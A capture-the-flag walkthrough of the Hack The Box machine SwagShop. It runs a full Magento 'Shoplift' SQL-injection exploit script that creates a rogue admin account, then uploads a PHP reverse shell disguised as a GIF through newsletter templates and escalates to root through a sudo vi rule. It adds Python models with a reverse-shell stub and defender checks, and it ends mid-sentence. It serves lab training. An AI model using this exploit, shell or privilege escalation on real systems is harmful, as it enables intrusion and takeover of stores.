┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.140
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.23 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.140
68/udp open|filtered dhcpc
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1042.92 seconds
┌──(kali💀kali)-[~/Desktop]
└─$ nikto -h http://10.10.10.140
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://swagshop.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /favicon.ico: identifies this app/server as: Magento Go CMS. See: https://en.wikipedia.org/wiki/Favicon
+ /app/: Directory indexing found.
+ /app/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ /install.php: install.php file found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /RELEASE_NOTES.txt: A database error may reveal internal details about the running database.
+ /RELEASE_NOTES.txt: Magento Shop Changelog identified.
+ /skin/adminhtml/default/default/media/editor.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploader.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploaderSingle.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /var/: Directory indexing found.
+ /var/: /var directory has indexing enabled.
+ 8060 requests: 1 error(s) and 20 item(s) reported on remote host
+ End Time: 2024-01-09 00:17:56 (GMT-5) (5655 seconds)
It’s running Magento, an open-source e-commerce platform written in PHP. Since it is off-the-shelf software, there are probably public vulnerabilities associated with it, but first we need a version number. Notice that the footer shows a 2014 copyright, so the install is likely years out of date and therefore quite possibly vulnerable. Just as there is a scanner for WordPress applications (WPScan), there is one for Magento applications called Mage Scan. Let’s use it to scan the application.
It reports the version as 1.9.0.0 or 1.9.0.1, Community Edition. No installed modules are detected, so any public vulnerabilities tied to third-party modules can be discarded. In the unreachable-path check, the last two paths give nothing useful, but the first path returns an XML file that leaks the swagshop MySQL database username and password. A configuration file readable over HTTP is a finding in its own right, whatever we do with it next.
The first three exploits don’t match our version, so we ignore them. The next two might be useful. Since Mage Scan reported no plugins, we ignore the plugin vulnerabilities. The two after that may apply to our version. Lastly, we also ignore the eBay Magento exploits.
That narrows it down to four candidates: 39838, 37811, 19793 and 37977. We start with exploit 37977 because it does not require authentication and it is described as an RCE vulnerability.
(searchsploit -m mirrors, i.e. copies, the exploit into the current working directory.)
After skimming the code, the exploit works by reaching the admin Cms_Wysiwyg directive controller without authentication and abusing a SQL injection in the report filter it evaluates: the stacked statements insert a new row into admin_user and bind it to the Administrators role in admin_role, giving us an administrative account with the username/password forme/forme.
To get the code working against our target, we need to make a few changes:
Remove the explanatory text at the top of the file that is not commented out (otherwise Python fails with a syntax error).
Change the target variable to http://10.10.10.140/
Optionally change the username/password from forme/forme to something random. Then run the exploit.
┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
DID NOT WORK
It didn’t work, and it doesn’t give much of an explanation why. So let’s route all of the script’s traffic through Burp. To do that, perform the following steps.
In Burp, go to Proxy > Options > Proxy Listeners > Add. In the Binding tab, set the bind port to 8081, and in the Request Handling tab set the Redirect to host option to 10.10.10.140 and the Redirect to port option to 80. Make sure the newly added listener is enabled once you’re done.
Go back to the script and change the target to http://localhost:8081
In Burp, turn intercept on.
This way all of the script’s traffic passes through Burp first. Run the script again and send the intercepted request to Repeater, then execute it there. As the image above shows, the script fails because the server cannot find the URL it posts to. Let’s try it in the browser.
I noticed that the admin panel is at http://swagshop.htb/index.php/admin and not at http://swagshop.htb/admin. Note that swagshop.htb has to resolve to 10.10.10.140 for this to work, for example through an /etc/hosts entry, since the site redirects to that hostname. I changed the script a bit to:
##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author : Manish Kishan Tanwar AKA error1046
#Date : 25/08/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At : Indishell Lab(originally developed by joren)
##################################################################################################
from __future__ import print_function  # keeps the script valid under both Python 2 and 3
import requests
import base64
import sys

# On this box the admin router lives under /index.php/, not under /admin/ at the web root
target = "http://swagshop.htb/index.php/"
if not target.startswith("http"):
    target = "http://" + target
if target.endswith("/"):
    target = target[:-1]

# Admin controller reachable without authentication; it evaluates {{...}} directives
target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

# Stacked SQL: create an active admin user whose password is stored in the
# Magento 1 format MD5(salt.password):salt, then attach it to the
# Administrators role (parent_id 1)
q = """
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
query = q.replace("\n", "").format(username="forme", password="forme")

# The injection point is the popularity report filter; ");" closes the report's
# own query and the stacked statements follow it
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is
# {{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter.encode()),
                        "forwarded": 1})
if r.ok:
    print("WORKED")
    print("Check {0}/admin with creds forme:forme".format(target))
else:
    print("DID NOT WORK")
┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
WORKED
Check http://swagshop.htb/index.php/admin with creds forme:forme
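To see what that request actually carries, here is an added Python example that is not part of the original write-up or of the Exploit-DB script. It rebuilds the three POST fields the exploit sends, shows the Magento 1 password format the injected row relies on (and the validateHash logic that accepts it), and adds a defender-side check over admin_user rows for the placeholder identity the public exploit leaves behind. The SQL and the directive are the exploit's own; directive_url, build_shoplift_post, magento1_hash, magento1_validate and suspicious_admin_rows are names chosen for this example, and the sample rows are constructed.

```python
import base64
import hashlib
import hmac

# The directive the script sends, decoded: a report grid block whose CSV export
# runs the attacker-controlled "filter" through the popularity report query.
DIRECTIVE = "{{block type=Adminhtml/report_search_grid output=getCsvFile}}"

# Same stacked statements as the exploit script: a fresh admin_user row plus an
# admin_role row binding it to the Administrators role (parent_id 1).
SQL_TEMPLATE = (
    "SET @SALT = 'rp';"
    "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));"
    "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
    "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,"
    "`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) "
    "VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());"
    "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) "
    "VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');"
)


def directive_url(target):
    """Admin controller the exploit posts to. On SwagShop the admin router sits
    under /index.php/, which is why the stock script (web-root /admin/) failed."""
    return target.rstrip("/") + "/admin/Cms_Wysiwyg/directive/index/"


def build_shoplift_post(username, password):
    """Assemble the three POST fields exactly as the exploit script does."""
    query = SQL_TEMPLATE.format(username=username, password=password)
    # ");" closes the report's own WHERE clause; the stacked statements follow it.
    pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);" + query
    return {
        "___directive": base64.b64encode(DIRECTIVE.encode()).decode(),
        "filter": base64.b64encode(pfilter.encode()).decode(),
        "forwarded": 1,
    }


def decode_filter(post):
    """Reverse the base64 so the injected SQL can be read in a proxy or a log."""
    return base64.b64decode(post["filter"]).decode()


def magento1_hash(password, salt="rp"):
    """What the injected SQL stores in admin_user.password: MD5(salt.password):salt."""
    return hashlib.md5((salt + password).encode()).hexdigest() + ":" + salt


def magento1_validate(password, stored):
    """Python rendering of Magento 1's validateHash(): split on ':' and re-hash.
    This is why a row inserted straight into the table logs in normally."""
    digest, _, salt = stored.partition(":")
    candidate = hashlib.md5((salt + password).encode()).hexdigest()
    return hmac.compare_digest(candidate, digest)


def suspicious_admin_rows(rows):
    """Defender's check over admin_user rows (list of dicts): flag the fixed
    salt 'rp' and the placeholder identity the public exploit inserts."""
    flagged = []
    for row in rows:
        if (row.get("password", "").endswith(":rp")
                or row.get("email") == "email@example.com"
                or row.get("firstname") == "Firstname"):
            flagged.append(row["username"])
    return flagged
```

Running build_shoplift_post("forme", "forme") and decoding the filter field is the quickest way to confirm in Burp that the SQL reached the server unmangled; the salt 'rp' and the email@example.com identity are constant in the public script, so they make a cheap indicator when auditing an admin_user table after the fact.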
Let’s log into Magento with the following credentials:
http://swagshop.htb/index.php/admin
Username: forme
Password: forme
Now we are in the Magento admin panel. There are several ways to get a shell from here, but we use the “Froghopper” attack, a file-upload technique that got its name from the frog meme image its author used to carry the shell. Uploaded images are served back as static files, so requesting one directly never executes the PHP inside it. Froghopper instead gets Magento itself to include the file through a newsletter template, and that only works once Allow Symlinks is enabled under System > Configuration > Developer > Template Settings, because otherwise Magento refuses to load a template from outside the theme directory.
Magento has a built-in allow-list for upload extensions, so only image types such as PNG, JPG and GIF are accepted. The check looks at the extension and the file header, not at the rest of the content, so a PHP file with an image signature in front and an image extension on the end goes through. We therefore took the reverse shell script and prepended a GIF signature to it (GIF89a is the real signature; the original notes used GIF98, which the loose check accepted as well).
Now create a new category named Demo. It must be active for the payload to work. Then upload the reverse shell script with a double extension as shown in the image below.
Category form values: Name = Demo, Is Active = Yes, Image = php-reverse-shell.php.png
Now go to Newsletter > Newsletter Templates and click Add New Template. Fill in the form with dummy details, and in the template content field add the directive pointing at the uploaded reverse shell, as shown below.
Back in the Newsletter Templates list, our newly created template is visible. Before previewing it, start a listener on the port set in the reverse shell. Then Preview the newsletter template as shown in the image below.
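Why the double-extension upload gets through, and why the preview still runs it, as an added Python model that is neither the page's code nor Magento's: a loose extension-plus-signature check of the kind the upload passed, a stricter check beside it, the Froghopper newsletter directive in the form Foregenix published (the page only says to add "the path of the template"), and the reason PHP's include() does not care about the .png suffix. The PHP body, the function names and the sample template path are constructed for this example; the number of ../ components needed in practice depends on the install.

```python
GIF_MAGIC = b"GIF89a"  # real GIF signature; the notes above used "GIF98"
IMAGE_EXT = {"png", "jpg", "jpeg", "gif"}
# Signatures keyed by the extension they belong to
MAGIC_BY_EXT = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Constructed stand-in for php-reverse-shell.php; not the real script
PHP_SHELL = b"<?php\n$s = fsockopen('10.10.16.4', 5555);\nproc_open('/bin/sh -i', array(0=>$s, 1=>$s, 2=>$s), $p);\n"


def make_polyglot(php_source):
    """Prefix the PHP with a GIF signature so a magic-bytes check sees an image."""
    return GIF_MAGIC + b"\n" + php_source


def loose_image_check(filename, data):
    """Extension + signature check of the kind that let the upload through:
    only the last extension and the leading bytes are inspected."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext not in IMAGE_EXT:
        return False
    return any(data.startswith(m) for magics in MAGIC_BY_EXT.values() for m in magics)


def strict_image_check(filename, data):
    """Hardened version: exactly one extension, the signature must match that
    extension, and no PHP open tag anywhere in the body."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in IMAGE_EXT:
        return False
    if not data.startswith(MAGIC_BY_EXT[parts[1]]):
        return False
    return b"<?" not in data


def froghopper_directive(template_rel_path):
    """Newsletter-template directive that makes Magento include() the upload.
    The path is relative to the theme template directory, hence the traversal
    back to media/catalog/category in practice (assumed layout)."""
    return '{{block type="core/template" template="%s"}}' % template_rel_path


def include_would_execute_php(data):
    """PHP's include() ignores the file extension and only looks for open tags:
    the GIF prefix is emitted as text and the code after it runs."""
    return b"<?php" in data
```

The practical takeaway for the defender side is the strict check: a single extension, a signature that matches it, and a refusal of anything containing an open tag. Re-encoding the upload through an image library drops the PHP body entirely and is the more robust fix.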
┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.140] 37208
Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
06:40:04 up 9:34, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@swagshop:/$
www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ cat user.txt
3a79acc----------------------------
Privesc to root
Checking the sudo permissions shows that www-data can run vi as root, restricted to file arguments that match /var/www/html/*. The glob only constrains the text of the argument, and vi can drop to a root shell from inside the editor (:!/bin/bash) whatever file was opened, so this rule is effectively full root. We use vi to edit index.php inside /var/www/html.
www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
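An added Python example, not from the write-up, of why this rule is root-equivalent even before considering vi's own shell escape: sudo matches the argument against the glob textually, so a path that starts with /var/www/html/ but walks back out with .. components still satisfies the rule, while a check that normalises the path first would reject it. The function names, the path-normalising check and the candidate list are constructed for this example; a correct path check would still not save the rule, because vi can run :!/bin/bash from inside the editor.

```python
import fnmatch
import os

SUDOERS_ARG_GLOB = "/var/www/html/*"   # argument pattern from the sudo -l output
WEBROOT = "/var/www/html"


def sudo_glob_allows(requested_arg, rule_glob=SUDOERS_ARG_GLOB):
    """Textual glob match as sudo applies it to command arguments: '*' is not
    stopped by '/' or '..', so traversal out of the web root still matches."""
    return fnmatch.fnmatchcase(requested_arg, rule_glob)


def stays_inside_webroot(requested_arg, root=WEBROOT):
    """What the rule's author presumably intended: collapse '..' first and
    require the resolved path to remain under the web root."""
    resolved = os.path.normpath(requested_arg)
    return os.path.commonpath([resolved, root]) == root


def escalation_paths(candidates):
    """Arguments the glob accepts but a normalised check would refuse."""
    return [c for c in candidates if sudo_glob_allows(c) and not stays_inside_webroot(c)]


if __name__ == "__main__":
    # Constructed candidates: a legitimate edit, a traversal, and a bare path
    for c in ["/var/www/html/index.php",
              "/var/www/html/../../../root/root.txt",
              "/root/root.txt"]:
        print(c, "glob:", sudo_glob_allows(c), "inside:", stays_inside_webroot(c))
```

normpath is a text operation, so this check is still not a security boundary (symlinks under the web root are not resolved, and the editor can open further files once running); the fix for a rule like this is not a better glob but not granting an interactive editor root privileges at all.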
Read Flag:
The fastest path to the flag is just to open it with vi. Based on the sudo output above, I’ll run: